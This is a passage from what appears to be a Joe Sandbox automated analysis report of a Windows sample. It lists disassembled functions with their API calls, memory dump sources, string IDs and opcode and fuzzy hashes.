                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: File
                • String ID:
                • API String ID: 749574446-0
                • Opcode ID: d23105ff7b5292153b9f0bca431dfab5107c06db0a0c9e8c0c20ce88f1c05f71
                • Instruction ID: 243f0531248df2cd0d897573444d5bf2da4a3bd580722204bebba21e78a2591e
                • Opcode Fuzzy Hash: d23105ff7b5292153b9f0bca431dfab5107c06db0a0c9e8c0c20ce88f1c05f71
                • Instruction Fuzzy Hash: 38B011300A080A8B8E002B30CC08828BA20FA2230A300A2A0B002CA0A0CB22C002AA00
                Function 0088A322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                Download Yara Rule
                APIs
                • SetCurrentDirectoryW.KERNELBASE(?,0088A587,C:\Users\user\Desktop,00000000,008B946A,00000006), ref: 0088A326
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: CurrentDirectory
                • String ID:
                • API String ID: 1611563598-0
                • Opcode ID: a90d1b139cea87548dbf0fef5393f9d0d772832eb5a52162fa157e747d45c30e
                • Instruction ID: 73cf9f7f556f5bb036c03676cd580ca940cac68ddadac228d593c7b9dfece83c
                • Opcode Fuzzy Hash: a90d1b139cea87548dbf0fef5393f9d0d772832eb5a52162fa157e747d45c30e
                • Instruction Fuzzy Hash: A0A01230194006568A000B30CC09C157650A761702F0086207002C00A0CB30C814A500

                Non-executed Functions

                Function 0088B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0087130B: GetDlgItem.USER32(00000000,00003021), ref: 0087134F
                  • Part of subcall function 0087130B: SetWindowTextW.USER32(00000000,008A35B4), ref: 00871365
                • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0088B971
                • EndDialog.USER32(?,00000006), ref: 0088B984
                • GetDlgItem.USER32(?,0000006C), ref: 0088B9A0
                • SetFocus.USER32(00000000), ref: 0088B9A7
                • SetDlgItemTextW.USER32(?,00000065,?), ref: 0088B9E1
                • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0088BA18
                • FindFirstFileW.KERNEL32(?,?), ref: 0088BA2E
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0088BA4C
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0088BA5C
                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0088BA78
                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0088BA94
                • _swprintf.LIBCMT ref: 0088BAC4
                  • Part of subcall function 0087400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0087401D
                • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0088BAD7
                • FindClose.KERNEL32(00000000), ref: 0088BADE
                • _swprintf.LIBCMT ref: 0088BB37
                • SetDlgItemTextW.USER32(?,00000068,?), ref: 0088BB4A
                • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0088BB67
                • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0088BB87
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0088BB97
                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0088BBB1
                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0088BBC9
                • _swprintf.LIBCMT ref: 0088BBF5
                • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0088BC08
                • _swprintf.LIBCMT ref: 0088BC5C
                • SetDlgItemTextW.USER32(?,00000069,?), ref: 0088BC6F
                  • Part of subcall function 0088A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0088A662
                  • Part of subcall function 0088A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,008AE600,?,?), ref: 0088A6B1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                • API String ID: 797121971-1840816070
                • Opcode ID: 2a16d5af30691fe30ad79b9ede58a914bfc0b6838d45b945ca01819ab3552f6d
                • Instruction ID: 75b7ff995bb7cc20e481c2573866f8f37eb99be6e2d6c6396959c8d79edc50ac
                • Opcode Fuzzy Hash: 2a16d5af30691fe30ad79b9ede58a914bfc0b6838d45b945ca01819ab3552f6d
                • Instruction Fuzzy Hash: 7A919572144348BBE631EBA4DC49FFBBBACFB8A700F044919F749D2491D775AA048762
                Function 0087718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 00877191
                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 008772F1
                • CloseHandle.KERNEL32(00000000), ref: 00877301
                  • Part of subcall function 00877BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00877C04
                  • Part of subcall function 00877BF5: GetLastError.KERNEL32 ref: 00877C4A
                  • Part of subcall function 00877BF5: CloseHandle.KERNEL32(?), ref: 00877C59
                • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0087730C
                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0087741A
                • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00877446
                • CloseHandle.KERNEL32(?), ref: 00877457
                • GetLastError.KERNEL32 ref: 00877467
                • RemoveDirectoryW.KERNEL32(?), ref: 008774B3
                • DeleteFileW.KERNEL32(?), ref: 008774DB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                • API String ID: 3935142422-3508440684
                • Opcode ID: b1de2dc913c12919c568fff01bdd71ca5c8e837ab36bd45c76a43754ed6e71e9
                • Instruction ID: 651acd0212237f97d03a62c1d7fc2cd41d7e3949f7d4c28db72678d9ef2aa80d
                • Opcode Fuzzy Hash: b1de2dc913c12919c568fff01bdd71ca5c8e837ab36bd45c76a43754ed6e71e9
                • Instruction Fuzzy Hash: 3CB1F271904214AADF21DFA8DC45BEEB7B8FF05304F0481A9FA49E7242D734EA49CB61
                Function 00873281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: H_prolog_memcmp
                • String ID: CMT$h%u$hc%u
                • API String ID: 3004599000-3282847064
                • Opcode ID: 2efa2b62d1a0cb667590b9f808706c68ba225693a8d3f450a3175e31738d2ba6
                • Instruction ID: e185b3bf5ad6af9e2d29db5cce24bafa6ff94df4eeb24f3a700fb7f6e84ac322
                • Opcode Fuzzy Hash: 2efa2b62d1a0cb667590b9f808706c68ba225693a8d3f450a3175e31738d2ba6
                • Instruction Fuzzy Hash: 44326F715106849BDF15DF68C886AEA3795FF25300F04847DED8ECB28ADB70EA44DB62
                Function 0089D00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: __floor_pentium4
                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                • API String ID: 4168288129-2761157908
                • Opcode ID: 47c25617ebe5ca1ed978ec4fc09d1dbedb82c2789165d641912dad14bbadc865
                • Instruction ID: 2f24497c33196a5cc17571e4597e63e8a99da6b630bacd4a93243f9664eb6990
                • Opcode Fuzzy Hash: 47c25617ebe5ca1ed978ec4fc09d1dbedb82c2789165d641912dad14bbadc865
                • Instruction Fuzzy Hash: 4EC22872E086288BDF25EE28DD407E9B7B5FB84315F1941EAD84DE7240E774AE818F44
                Function 008727E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 008727F1
                • _strlen.LIBCMT ref: 00872D7F
                  • Part of subcall function 0088137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0087B652,00000000,?,?,?,000103EE), ref: 00881396
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00872EE0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                • String ID: CMT
                • API String ID: 1706572503-2756464174
                • Opcode ID: 91d9bd32cbd2da9c0ff25cc8110623600c767851c01037457413b0357efea9f8
                • Instruction ID: 99d084de95a5f40df86ae516fd7e932ee5990b11a89d011e920edbbb05977265
                • Opcode Fuzzy Hash: 91d9bd32cbd2da9c0ff25cc8110623600c767851c01037457413b0357efea9f8
                • Instruction Fuzzy Hash: EE62CF715002448FDB29DF28C8856EA7BE1FF64304F08857DED9ECB28ADA71E945CB61
                Function 0089866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00898767
                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00898771
                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0089877E
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                • Opcode ID: 80b50aef1fa3085da67c6f66db77d6c6cda24e02d3e806f9bea5239a1b6bf9ec
                • Instruction ID: 4a9d08ce7f958d0c52b348f5e1473c0ea1e54f4b1489170426a410cd64d517e8
                • Opcode Fuzzy Hash: 80b50aef1fa3085da67c6f66db77d6c6cda24e02d3e806f9bea5239a1b6bf9ec
                • Instruction Fuzzy Hash: 4E31C875901229ABCB21EF68D88979CB7B8FF19310F5041EAF90CA7251EB349F858F45
                Function 0089AAA8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID: .
                • API String ID: 0-248832578
                • Opcode ID: 9100f2d7953e86f5b3aee4bb01516db7bf7c9532b11a1819981f4b8df98d48a1
                • Instruction ID: a36976e439eacbda2889b4b9bfa5b9fb71e8e83511722ddb9c411194a2853de5
                • Opcode Fuzzy Hash: 9100f2d7953e86f5b3aee4bb01516db7bf7c9532b11a1819981f4b8df98d48a1
                • Instruction Fuzzy Hash: FC310671800109AFDF28AE79CC84EEB7BBEEB85314F0801A8F519D7251D6309D44CB91
                Function 0089CB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                • Instruction ID: 2d82d19f7eddcf3525c000663933183f4277edac00f0018df3f1207b72faa9f9
                • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                • Instruction Fuzzy Hash: D0020C71E002199FDF14DFA9D8806ADBBF1FF88314F29816AE919E7384D731A941CB94
                Function 0088A63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                Download Yara Rule
                APIs
                • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0088A662
                • GetNumberFormatW.KERNEL32(00000400,00000000,?,008AE600,?,?), ref: 0088A6B1
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: FormatInfoLocaleNumber
                • String ID:
                • API String ID: 2169056816-0
                • Opcode ID: a931fd21f12e705040e76846d23fdf5b7088d6284cfda0a4be152b9d5645870b
                • Instruction ID: 0e70a18bf14d6e1e3f7e71efb2194f59551fae3731ed28816691d31bff61d313
                • Opcode Fuzzy Hash: a931fd21f12e705040e76846d23fdf5b7088d6284cfda0a4be152b9d5645870b
                • Instruction Fuzzy Hash: 4F015E36150208BAE7209FA4DC45F9B77BCFF19710F008822BA04D7150E3749A15CBA5
                Function 00876EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(0088117C,?,00000200), ref: 00876EC9
                • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00876EEA
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ErrorFormatLastMessage
                • String ID:
                • API String ID: 3479602957-0
                • Opcode ID: 8bab9e95756e62d94c5c10f1d371031ae6a33a5f64ce2efa939b58051b65e532
                • Instruction ID: ba362aecaf738b0dea31e65a2496c30ec1008cc20b7004848030590777d37967
                • Opcode Fuzzy Hash: 8bab9e95756e62d94c5c10f1d371031ae6a33a5f64ce2efa939b58051b65e532
                • Instruction Fuzzy Hash: 76D0C9363C8706BFFA510A74CC06F6B7BA4B757B86F20D514B35BE98E0DA70D0249629
                Function 008A1194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,008A118F,?,?,00000008,?,?,008A0E2F,00000000), ref: 008A13C1
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ExceptionRaise
                • String ID:
                • API String ID: 3997070919-0
                • Opcode ID: d9e5fd2f37228bc1a4934ed0b78b17ae56972ca54817dc205389cfa83b8cf818
                • Instruction ID: d4b4b93c75088db188e3ccae8f325bab1e382a985a475c328b371ef12866bca6
                • Opcode Fuzzy Hash: d9e5fd2f37228bc1a4934ed0b78b17ae56972ca54817dc205389cfa83b8cf818
                • Instruction Fuzzy Hash: 62B16C31610608DFEB15CF2CC48AB657BE1FF4A364F298658E899CF6A1C335E991CB44
                Function 0087407E Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID: gj
                • API String ID: 0-4203073231
                • Opcode ID: f3c38bbc8351cc3c560752df229a8a63bb328391e93f4ce17ea751f8e325578c
                • Instruction ID: c427a4aa35c55e8a4a275561ab4f1a2a2694c18fa0603dd4535bcb4b8b5469f4
                • Opcode Fuzzy Hash: f3c38bbc8351cc3c560752df229a8a63bb328391e93f4ce17ea751f8e325578c
                • Instruction Fuzzy Hash: E2F1B3B1A083418FD748CF29D880A1AFBE1BFCC208F15896EF598D7711E734E9558B56
                Function 0087ACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                Download Yara Rule
                APIs
                • GetVersionExW.KERNEL32(?), ref: 0087AD1A
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Version
                • String ID:
                • API String ID: 1889659487-0
                • Opcode ID: 0e1fa25fa039568abae682d5e59ae53309525ca22198c3e421e164cec2ab1c3c
                • Instruction ID: e7665f9367930cea3d87469d31a88108a94cd8bd19723839328f5a23fd577c49
                • Opcode Fuzzy Hash: 0e1fa25fa039568abae682d5e59ae53309525ca22198c3e421e164cec2ab1c3c
                • Instruction Fuzzy Hash: 08F01DB0E0020C8BD738CF18EC416EA77B5F799715F204695EA1983798D770AD40CE61
                Function 0088F063 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                Download Yara Rule
                APIs
                • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,0088EAC5), ref: 0088F068
                Memory Dump Source
